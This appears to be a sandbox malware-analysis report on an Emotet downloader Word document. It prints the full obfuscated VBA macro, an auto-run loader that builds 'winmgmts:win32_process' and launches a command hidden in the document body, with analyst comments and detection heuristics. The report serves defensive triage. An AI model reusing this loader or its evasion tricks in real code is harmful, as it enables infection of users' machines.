MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS | Document contains VBA macro code
-
CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call. Matched line in script:
Set Shaqdm8bfwad = CreateObject(Ouefbbewa7ikgdlri)
-
VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro | low | OLE_VBA_DOCOPEN | Document_Open macro. Matched line in script:
Private Sub Document_open()
-
Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
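Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This value is the standard DrawingML XML namespace identifier found in Office documents, so it should not be treated as a network indicator or added to blocklists.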
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13500 bytes |
SHA-256: 1b2b00055c80e68b6aa687bc64112642d1a28d5afaeaab4b15d181d8f231de3b |
|||
|
Detection
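ClamAV (scan of this extracted artifact, macros.bas):
No threats found. The Doc.Downloader.EmotetRed0121-9822961-0 verdict listed under Heuristics is reported for the submitted document, not for this decoded macro text.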
Obfuscation or payload:
likely
108 of 196 identifiers look randomly generated (e.g. 'Ve8ody9kr3y0rabzp4') — consistent with name-mangling obfuscation.
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Zrr234efv7j6dfwr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point (flagged by the report as OLE_VBA_DOCOPEN).
' Word runs this handler when the document is opened with macros enabled.
' Its only statement calls Nauw80ycpl9g4a8c, which is defined in another
' module of the same VBA project.
Private Sub Document_open()
Nauw80ycpl9g4a8c
End Sub
Attribute VB_Name = "Xod5qe3cijo"
Attribute VB_Name = "Cn9inbqhh7rb"
' Analyst notes from a static read of the extracted source; nothing was executed.
'
' Main routine, called from Document_open.
'
' Control flow: every "GoTo <label>" below is unconditional and lands on the
' matching "<label>:" line, so each Dim / For Each ... Next block between a
' GoTo and its label is never run. Those blocks are padding. Their first test,
' Left(..., Len("xxx")) = "xxxx", compares a 3-character prefix with a
' 4-character literal and could not be true even if reached.
'
' Live statements, in order:
'   1. V1 is built from the ThisDocument module's .Content (the module is named
'      Zrr234efv7j6dfwr with VB_Base "1Normal.ThisDocument").
'   2. Five string fragments are assigned; each is padded with the filler
'      "sg yw ah".
'   3. The fragments are concatenated and passed to M940ybl7gxsn0, which
'      forwards to Ugfdof20y_tl8 (a Replace on the filler).
'   4. The result is the argument to CreateObject.
'   5. .Create is called on that object with a string derived from V1.
'
' Reading the fragments with the filler removed by hand gives "winmgmt",
' one character taken from Application.Name, ":win32_", "p" and "rocess".
' If the host reports "Microsoft Word", position 6 is "s" and the CreateObject
' argument is "winmgmts:win32_process". NOTE(review): this assumes the filler
' is replaced with an empty string; confirm in a sandbox trace.
'
' Triage implications:
'   - The string passed to .Create comes from the document body, not from this
'     macro source, so the launched command is not visible in macros.bas.
'     Recover it offline by extracting the document text and removing the
'     same filler.
'   - Process creation through WMI is normally parented by WmiPrvSE.exe rather
'     than WINWORD.EXE, so parent/child rules keyed only on Office spawning
'     children can miss it. Correlate WMI Win32_Process Create activity with a
'     recent document open instead.
'   - On Error Resume Next hides runtime failures from the user.
Function Nauw80ycpl9g4a8c()
On Error Resume Next
' Rwqlpkfene6qza_mu8 and L6upc7nnidv40cli are never assigned in the visible
' script, so V1 is presumably just the document body text.
V1 = Rwqlpkfene6qza_mu8 + Zrr234efv7j6dfwr.Content + L6upc7nnidv40cli
GoTo qgJHIBDk
' --- junk block, skipped by the GoTo above ---
Dim PkEMQHQI As Paragraph
Set jXcEdDdh = zpjupEh
For Each PkEMQHQI In Zrr234efv7j6dfwr.Paragraphs
Set XkpfH = eCRuCvmR
If Left(PkEMQHQI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qgJHIBDk = PkEMQHQI.Range.ListFormat.ListString
ElseIf InStr(PkEMQHQI.Range.Text, "kkiew") > 1 Then
kkDQfX = PkEMQHQI.Range.Text
kkDQfX = Replace(saw, "sjgwb", "hqkwjbjdasd" & qgJHIBDk)
PkEMQHQI.Range.Text = kkDQfX
Set PkEMQHQI.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set BjcJA = ArYQiJ
Next PkEMQHQI
qgJHIBDk:
' Fragments 4 and 5 of the object string: "p" and "rocess" once the filler is removed.
U7 = "sg yw ahpsg yw ah"
F37gkh5_9t3r = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo xtPlEAvEB
' --- junk block, skipped ---
Dim fIusJqBAL As Paragraph
Set RmhgAAs = uQHtALnA
For Each fIusJqBAL In Zrr234efv7j6dfwr.Paragraphs
Set qnRgF = lByKJ
If Left(fIusJqBAL.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xtPlEAvEB = fIusJqBAL.Range.ListFormat.ListString
ElseIf InStr(fIusJqBAL.Range.Text, "kkiew") > 1 Then
CyayE = fIusJqBAL.Range.Text
CyayE = Replace(saw, "sjgwb", "hqkwjbjdasd" & xtPlEAvEB)
fIusJqBAL.Range.Text = CyayE
Set fIusJqBAL.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set gOmpaGAD = ISMirbJQH
Next fIusJqBAL
xtPlEAvEB:
' Fragment 3: ":win32_" once the filler is removed.
Hy2hjp4_v0706 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo nnFWNeJaY
' --- junk block, skipped ---
Dim SGiFs As Paragraph
Set OdUCHIyBD = BUWGFwQCg
For Each SGiFs In Zrr234efv7j6dfwr.Paragraphs
Set sGoOXGGJ = TcIDRFo
If Left(SGiFs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nnFWNeJaY = SGiFs.Range.ListFormat.ListString
ElseIf InStr(SGiFs.Range.Text, "kkiew") > 1 Then
yLAlF = SGiFs.Range.Text
yLAlF = Replace(saw, "sjgwb", "hqkwjbjdasd" & nnFWNeJaY)
SGiFs.Range.Text = yLAlF
Set SGiFs.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set tsHIDq = FyEFKF
Next SGiFs
nnFWNeJaY:
' Fragment 1: "winmgmt" once the filler is removed.
Ve8ody9kr3y0rabzp4 = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo iYklDEA
' --- junk block, skipped ---
Dim WxOGCHzmj As Paragraph
Set VITsNGfPD = eQkFD
For Each WxOGCHzmj In Zrr234efv7j6dfwr.Paragraphs
Set tXqhdfDBF = bvuTm
If Left(WxOGCHzmj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
iYklDEA = WxOGCHzmj.Range.ListFormat.ListString
ElseIf InStr(WxOGCHzmj.Range.Text, "kkiew") > 1 Then
kTDpu = WxOGCHzmj.Range.Text
kTDpu = Replace(saw, "sjgwb", "hqkwjbjdasd" & iYklDEA)
WxOGCHzmj.Range.Text = kTDpu
Set WxOGCHzmj.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set eayuAL = DvusGw
Next WxOGCHzmj
iYklDEA:
' Fragment 2: a single character taken from the host application's name,
' Mid(name, 6, 1), wrapped in filler. The arithmetic (3 + 3, 1 / 1) only hides
' the constants 6 and 1. Presumably "s" when the host is "Microsoft Word".
K54a9h7okem60vyz = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo pdVdIL
' --- junk block, skipped ---
Dim EUPQF As Paragraph
Set bRRtJHA = kTcZVBIEA
For Each EUPQF In Zrr234efv7j6dfwr.Paragraphs
Set ithfAA = LQCzBFBIC
If Left(EUPQF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pdVdIL = EUPQF.Range.ListFormat.ListString
ElseIf InStr(EUPQF.Range.Text, "kkiew") > 1 Then
CDmYCFCHh = EUPQF.Range.Text
CDmYCFCHh = Replace(saw, "sjgwb", "hqkwjbjdasd" & pdVdIL)
EUPQF.Range.Text = CDmYCFCHh
Set EUPQF.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set FfijSCII = GxNSH
Next EUPQF
pdVdIL:
' Concatenate the five fragments in their final order (still carrying filler).
O9uo3zajcs4cwus0t = Ve8ody9kr3y0rabzp4 + K54a9h7okem60vyz + Hy2hjp4_v0706 + U7 + F37gkh5_9t3r
GoTo XqJfDu
' --- junk block, skipped ---
Dim VhHNG As Paragraph
Set dMzCLzB = XSLGn
For Each VhHNG In Zrr234efv7j6dfwr.Paragraphs
Set JGFrGwJx = CPuSFEBH
If Left(VhHNG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XqJfDu = VhHNG.Range.ListFormat.ListString
ElseIf InStr(VhHNG.Range.Text, "kkiew") > 1 Then
MgeehAE = VhHNG.Range.Text
MgeehAE = Replace(saw, "sjgwb", "hqkwjbjdasd" & XqJfDu)
VhHNG.Range.Text = MgeehAE
Set VhHNG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set mqWzIC = oLTKEFI
Next VhHNG
XqJfDu:
' Strip the filler from the concatenated string via the helper chain.
Ouefbbewa7ikgdlri = M940ybl7gxsn0(O9uo3zajcs4cwus0t)
GoTo eEuSBx
' --- junk block, skipped ---
Dim UvZZiJCFB As Paragraph
Set yEYkDAI = AkWgBC
For Each UvZZiJCFB In Zrr234efv7j6dfwr.Paragraphs
Set wUDKxAwJ = mDqJMCHJG
If Left(UvZZiJCFB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
eEuSBx = UvZZiJCFB.Range.ListFormat.ListString
ElseIf InStr(UvZZiJCFB.Range.Text, "kkiew") > 1 Then
WGyFEHDCs = UvZZiJCFB.Range.Text
WGyFEHDCs = Replace(saw, "sjgwb", "hqkwjbjdasd" & eEuSBx)
UvZZiJCFB.Range.Text = WGyFEHDCs
Set UvZZiJCFB.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set WkWjU = tKniopRDI
Next UvZZiJCFB
eEuSBx:
' This is the line the report matched for OLE_VBA_CREATEOBJ. The argument is a
' runtime-built string, so the object name never appears as a literal in the
' source and plain string matching on it will miss this sample.
Set Shaqdm8bfwad = CreateObject(Ouefbbewa7ikgdlri)
GoTo BweyJWjN
' --- junk block, skipped ---
Dim eXdIsXH As Paragraph
Set yUVdBI = FdwNm
For Each eXdIsXH In Zrr234efv7j6dfwr.Paragraphs
Set vQYVFu = WjGnICj
If Left(eXdIsXH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
BweyJWjN = eXdIsXH.Range.ListFormat.ListString
ElseIf InStr(eXdIsXH.Range.Text, "kkiew") > 1 Then
JfkGCMFBJ = eXdIsXH.Range.Text
JfkGCMFBJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & BweyJWjN)
eXdIsXH.Range.Text = JfkGCMFBJ
Set eXdIsXH.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set pIvZbm = iqcZCA
Next eXdIsXH
BweyJWjN:
' KK = V1 from its 4th character onward, passed through the same filler removal.
' It is the first argument to .Create. U5_f_u03ozq_vmk and Cf38fkmovvb5czp are
' not assigned in the visible script (presumably Empty).
KK = M940ybl7gxsn0(Mid(V1, (4), Len(V1)))
Shaqdm8bfwad.Create KK, U5_f_u03ozq_vmk, Cf38fkmovvb5czp
GoTo fjDbJNJPE
' --- junk block, skipped ---
Dim PtkdV As Paragraph
Set cMGoJCNVA = GJlcnAJF
For Each PtkdV In Zrr234efv7j6dfwr.Paragraphs
Set qJMVH = fWdzlF
If Left(PtkdV.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fjDbJNJPE = PtkdV.Range.ListFormat.ListString
ElseIf InStr(PtkdV.Range.Text, "kkiew") > 1 Then
ovddIBdH = PtkdV.Range.Text
ovddIBdH = Replace(saw, "sjgwb", "hqkwjbjdasd" & fjDbJNJPE)
PtkdV.Range.Text = ovddIBdH
Set PtkdV.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set IPpqJRIHA = QBZkFCjDB
Next PtkdV
fjDbJNJPE:
End Function
' Analyst notes from a static read; nothing was executed.
'
' Pass-through wrapper in the string-decoding chain. It copies its argument to a
' local, hands it to Ugfdof20y_tl8, and returns that result unchanged. It adds
' no transformation of its own and only lengthens the call chain.
'
' Each "GoTo <label>" is unconditional, so the Dim / For Each ... Next block
' between a GoTo and its label never runs; those blocks are padding.
' On Error Resume Next suppresses any runtime error.
Function M940ybl7gxsn0(Oq65ksqlyqv)
On Error Resume Next
GoTo LocCJZl
' --- junk block, skipped by the GoTo above ---
Dim pnZRAEAH As Paragraph
Set sPLPeJYJJ = bSxgGS
For Each pnZRAEAH In Zrr234efv7j6dfwr.Paragraphs
Set OEqhJE = LwmxBVIo
If Left(pnZRAEAH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
LocCJZl = pnZRAEAH.Range.ListFormat.ListString
ElseIf InStr(pnZRAEAH.Range.Text, "kkiew") > 1 Then
vKCSIXInm = pnZRAEAH.Range.Text
vKCSIXInm = Replace(saw, "sjgwb", "hqkwjbjdasd" & LocCJZl)
pnZRAEAH.Range.Text = vKCSIXInm
Set pnZRAEAH.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set GmvyqA = FpkHHFB
Next pnZRAEAH
LocCJZl:
' Live statement 1: copy the input.
Z1vu7shx6ohh = Oq65ksqlyqv
GoTo EcOCDH
' --- junk block, skipped ---
Dim TTxCHfEJ As Paragraph
Set rKDDEJ = wDFTJZ
For Each TTxCHfEJ In Zrr234efv7j6dfwr.Paragraphs
Set HdjvFIB = ppZxs
If Left(TTxCHfEJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EcOCDH = TTxCHfEJ.Range.ListFormat.ListString
ElseIf InStr(TTxCHfEJ.Range.Text, "kkiew") > 1 Then
oIZOycGL = TTxCHfEJ.Range.Text
oIZOycGL = Replace(saw, "sjgwb", "hqkwjbjdasd" & EcOCDH)
TTxCHfEJ.Range.Text = oIZOycGL
Set TTxCHfEJ.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set sfEiAD = YttgyJHB
Next TTxCHfEJ
EcOCDH:
' Live statement 2: delegate to the filler-removal routine.
Jau59gohhc5mpcaict = Ugfdof20y_tl8(Z1vu7shx6ohh)
GoTo uYLIH
' --- junk block, skipped ---
Dim zxiuDSBC As Paragraph
Set yRvSBDLC = erAEW
For Each zxiuDSBC In Zrr234efv7j6dfwr.Paragraphs
Set rPYjLQB = CligkqA
If Left(zxiuDSBC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
uYLIH = zxiuDSBC.Range.ListFormat.ListString
ElseIf InStr(zxiuDSBC.Range.Text, "kkiew") > 1 Then
yYVear = zxiuDSBC.Range.Text
yYVear = Replace(saw, "sjgwb", "hqkwjbjdasd" & uYLIH)
zxiuDSBC.Range.Text = yYVear
Set zxiuDSBC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set OwgXbBHA = JIoTFRGfg
Next zxiuDSBC
uYLIH:
' Live statement 3: set the function's return value.
M940ybl7gxsn0 = Jau59gohhc5mpcaict
GoTo jziaFFHEF
' --- junk block, skipped ---
Dim KGROJG As Paragraph
Set zddVECCDD = GyCLISD
For Each KGROJG In Zrr234efv7j6dfwr.Paragraphs
Set kNuSDBPHB = GQIVJDlG
If Left(KGROJG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jziaFFHEF = KGROJG.Range.ListFormat.ListString
ElseIf InStr(KGROJG.Range.Text, "kkiew") > 1 Then
uJBkFLHIN = KGROJG.Range.Text
uJBkFLHIN = Replace(saw, "sjgwb", "hqkwjbjdasd" & jziaFFHEF)
KGROJG.Range.Text = uJBkFLHIN
Set KGROJG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set bTGpjH = nNVFHJEZ
Next KGROJG
jziaFFHEF:
End Function
' Analyst notes from a static read; nothing was executed.
'
' String de-obfuscation primitive. The single live statement returns the input
' with every occurrence of the filler "sg yw ah" replaced by Ft8q6p97ggtp.
' Ft8q6p97ggtp is never assigned in the visible script, so it is presumably
' Empty and the filler is simply deleted. TODO confirm in a sandbox trace.
'
' Analysts can reproduce the decoding offline by deleting the same literal from
' the macro's string constants and from the document body text.
'
' Every other Dim / For Each ... Next block sits between an unconditional GoTo
' and its label and never runs. Several GoTo/label pairs here enclose no live
' statement at all; they are pure padding.
Function Ugfdof20y_tl8(Qw90xeh0iky_)
GoTo HfmzOPDEX
' --- junk block, skipped by the GoTo above ---
Dim espbwWsA As Paragraph
Set lxfjR = pkVenCPvE
For Each espbwWsA In Zrr234efv7j6dfwr.Paragraphs
Set sAUHADFGJ = zPOZNeHs
If Left(espbwWsA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HfmzOPDEX = espbwWsA.Range.ListFormat.ListString
ElseIf InStr(espbwWsA.Range.Text, "kkiew") > 1 Then
vJllo = espbwWsA.Range.Text
vJllo = Replace(saw, "sjgwb", "hqkwjbjdasd" & HfmzOPDEX)
espbwWsA.Range.Text = vJllo
Set espbwWsA.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set SXHRLB = LIvJfJC
Next espbwWsA
HfmzOPDEX:
GoTo IQSOFi
' --- junk block, skipped ---
Dim HoqHZEBAE As Paragraph
Set vbtbFJIAt = dhYLg
For Each HoqHZEBAE In Zrr234efv7j6dfwr.Paragraphs
Set RauDJy = qGozJ
If Left(HoqHZEBAE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
IQSOFi = HoqHZEBAE.Range.ListFormat.ListString
ElseIf InStr(HoqHZEBAE.Range.Text, "kkiew") > 1 Then
uIPhxJIq = HoqHZEBAE.Range.Text
uIPhxJIq = Replace(saw, "sjgwb", "hqkwjbjdasd" & IQSOFi)
HoqHZEBAE.Range.Text = uIPhxJIq
Set HoqHZEBAE.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set QyrHFHDAH = nukdsrU
Next HoqHZEBAE
IQSOFi:
GoTo CFQQJE
' --- junk block, skipped ---
Dim wHQiPJAIC As Paragraph
Set eebRpHD = IQfvrE
For Each wHQiPJAIC In Zrr234efv7j6dfwr.Paragraphs
Set SGxVJiM = wvYYDGDSX
If Left(wHQiPJAIC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CFQQJE = wHQiPJAIC.Range.ListFormat.ListString
ElseIf InStr(wHQiPJAIC.Range.Text, "kkiew") > 1 Then
kGdRuHH = wHQiPJAIC.Range.Text
kGdRuHH = Replace(saw, "sjgwb", "hqkwjbjdasd" & CFQQJE)
wHQiPJAIC.Range.Text = kGdRuHH
Set wHQiPJAIC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set vaOIG = vpUHEAAbv
Next wHQiPJAIC
CFQQJE:
' The only live statement: remove the filler and set the return value.
Ugfdof20y_tl8 = Replace(Qw90xeh0iky_, "sg yw ah", Ft8q6p97ggtp)
GoTo VxjDR
' --- junk block, skipped ---
Dim XRnUCBQ As Paragraph
Set hftPzFIy = dctJFIGgI
For Each XRnUCBQ In Zrr234efv7j6dfwr.Paragraphs
Set LxNSICFGA = yXyEuG
If Left(XRnUCBQ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VxjDR = XRnUCBQ.Range.ListFormat.ListString
ElseIf InStr(XRnUCBQ.Range.Text, "kkiew") > 1 Then
xKgAJqMG = XRnUCBQ.Range.Text
xKgAJqMG = Replace(saw, "sjgwb", "hqkwjbjdasd" & VxjDR)
XRnUCBQ.Range.Text = xKgAJqMG
Set XRnUCBQ.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set sLJHIAu = DzIECBFmB
Next XRnUCBQ
VxjDR:
GoTo UUXWHDEuR
' --- junk block, skipped ---
Dim RaEwG As Paragraph
Set VYiKlEo = ZnqEqJNCG
For Each RaEwG In Zrr234efv7j6dfwr.Paragraphs
Set brDPII = FuRqMJCEH
If Left(RaEwG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UUXWHDEuR = RaEwG.Range.ListFormat.ListString
ElseIf InStr(RaEwG.Range.Text, "kkiew") > 1 Then
YBitQEdu = RaEwG.Range.Text
YBitQEdu = Replace(saw, "sjgwb", "hqkwjbjdasd" & UUXWHDEuR)
RaEwG.Range.Text = YBitQEdu
Set RaEwG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set xBPiAtJb = jDzXDBA
Next RaEwG
UUXWHDEuR:
GoTo XILGHA
' --- junk block, skipped ---
Dim tzUACC As Paragraph
Set YxIuEAAjE = LbNCA
For Each tzUACC In Zrr234efv7j6dfwr.Paragraphs
Set DEOMVy = HwhJBDel
If Left(tzUACC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XILGHA = tzUACC.Range.ListFormat.ListString
ElseIf InStr(tzUACC.Range.Text, "kkiew") > 1 Then
mOpEbVS = tzUACC.Range.Text
mOpEbVS = Replace(saw, "sjgwb", "hqkwjbjdasd" & XILGHA)
tzUACC.Range.Text = mOpEbVS
Set tzUACC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set asPNBFvHh = WiDxITBF
Next tzUACC
XILGHA:
End Function
|
|||